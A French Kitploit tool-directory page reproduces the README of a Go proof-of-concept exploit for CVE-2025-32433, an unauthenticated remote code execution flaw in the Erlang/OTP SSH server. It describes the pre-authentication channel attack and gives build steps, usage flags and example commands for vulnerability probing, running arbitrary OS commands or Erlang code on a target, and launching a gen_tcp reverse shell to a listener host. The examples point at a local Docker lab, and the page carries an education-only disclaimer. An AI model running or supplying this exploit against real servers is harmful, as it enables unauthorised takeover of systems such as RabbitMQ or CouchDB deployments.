Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-32433 — Go PoC pour CVE-2025-32433 — RCE non authentifié dans Erlang/OTP SSH. | Kitploit
Outils/GitHubGitHub/joshuavanderpoll/cve-2025-32433
Analyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationOutil d'Accès à DistanceDéveloppement de Charges Utiles
GitHubjoshuavanderpoll/cve-2025-32433

cve-2025-32433

Go PoC pour CVE-2025-32433 — RCE non authentifié dans Erlang/OTP SSH.

Voir le dépôt
2il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

Erlang/OTP SSH RCE aveugle non authentifiée (CVE-2025-32433) PoC

Go

📜 Description

CVE-2025-32433 est une vulnérabilité critique d'exécution de code à distance non authentifiée dans le serveur SSH d'Erlang/OTP. Avant les versions corrigées, le démon SSH traite incorrectement les messages de canal avant la fin de l'authentification, ce qui permet à un attaquant d'ouvrir un canal et d'envoyer des requêtes exec sans jamais fournir d'identifiants. Toute application intégrant le serveur SSH d'Erlang/OTP (notamment Elixir, RabbitMQ, CouchDB et d'autres) est concernée lorsque le port SSH est exposé.

Ce PoC Go se connecte au port SSH d'une cible, envoie un SSH_MSG_CHANNEL_OPEN forgé suivi d'une charge utile exec SSH_MSG_CHANNEL_REQUEST — entièrement avant l'authentification — amenant le nœud Erlang distant à exécuter des commandes OS arbitraires. L'exécution est aveugle : aucune sortie de commande n'est renvoyée à l'attaquant.

Versions concernées : Erlang/OTP < 27.3.3, < 26.2.5.11, < 25.3.2.20

✨ Fonctionnalités

  • Vérification de vulnérabilité — sonder une cible pour confirmer qu'elle est vulnérable avant de l'exploiter
  • Exécution de commandes — exécuter des commandes OS via bash -c, encapsulées automatiquement dans os:cmd d'Erlang
  • Exécution Erlang brute — envoyer n'importe quelle expression Erlang directement, sans wrapper shell
  • Reverse shell — déployer un reverse shell natif gen_tcp sans dépendre de bash ni de /dev/tcp
  • Support IPv6 — fonctionne avec des cibles IPv4 et IPv6
  • Aucune dépendance — binaire unique, uniquement la bibliothèque standard Go

🛠️ Installation

Des binaires précompilés pour macOS, Linux et Windows sont disponibles sur la page Releases. Téléchargez le binaire pour votre plateforme et exécutez-le directement — aucune installation de Go requise.

Ou compilez depuis les sources :

[!NOTE] Nécessite Go 1.21+. Aucune dépendance externe — utilise uniquement la bibliothèque standard Go.

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-32433.git
cd CVE-2025-32433
go build -o cve-2025-32433 cve-2025-32433.go

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2025-32433.git
cd CVE-2025-32433
go build -o cve-2025-32433.exe cve-2025-32433.go

Installer directement avec Go

root@kitploit:~
go install github.com/joshuavanderpoll/cve-2025-32433@latest

Exécuter sans installation

root@kitploit:~
go run github.com/joshuavanderpoll/cve-2025-32433@latest -host 192.168.1.100 -port 22

⚙️ Utilisation

root@kitploit:~
Usage of ./cve-2025-32433:
  -host string
        Target IP or hostname
  -port int
        SSH port (default: 22) (default 22)
  -timeout int
        Connection timeout in seconds (default: 5) (default 5)
  -command string
        Shell command to run on the target (wrapped in os:cmd)
  -code string
        Raw Erlang expression to execute on the target
  -shell
        Send an Erlang-native gen_tcp reverse shell
  -lhost string
        Listener IP for reverse shell (required with -shell)
  -lport int
        Listener port for reverse shell (default: 4444)

Vérifier si une cible est vulnérable

root@kitploit:~
./cve-2025-32433 -host 127.0.0.1 -port 2222

Exemple de vérification de vulnérabilité

Exécution de commandes

root@kitploit:~
./cve-2025-32433 -host 127.0.0.1 -port 2222 -command 'whoami > /tmp/out2.txt'

Exemple d'exécution de commande

Reverse shell

Le flag -shell envoie une charge utile de reverse shell gen_tcp native Erlang — aucun besoin de bash ni de /dev/tcp. Lancez d'abord un listener, puis envoyez l'exploit.

root@kitploit:~
./cve-2025-32433 -host 127.0.0.1 -port 2222 -shell -lhost host.docker.internal -lport 4444 

Exemple d'exécution de code

Exécution de code

Le flag -code envoie une expression Erlang brute directement — sans wrapper bash -c. Utile pour des opérations purement Erlang ou lorsque bash n'est pas disponible sur la cible. L'exécution étant aveugle, écrivez la sortie dans un fichier et récupérez-la séparément.

root@kitploit:~
./cve-2025-32433 -host 127.0.0.1 -port 2222 -code 'file:write_file("/tmp/out.txt", os:cmd("id")).'

Exemple d'exécution de code

🐋 PoC Docker

Plus de détails dans docker/DOCKER.md

root@kitploit:~
cd docker/
docker compose down
docker compose up -d
# You can test at -host 127.0.0.1 -port 2222

🕵🏼 Références

  • Erlang/OTP Security Advisory
  • NVD — CVE-2025-32433
  • HackIndex

📢 Avertissement

Cet outil est fourni à des fins éducatives et de recherche uniquement. Le créateur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par l'outil.

Télécharger l’outil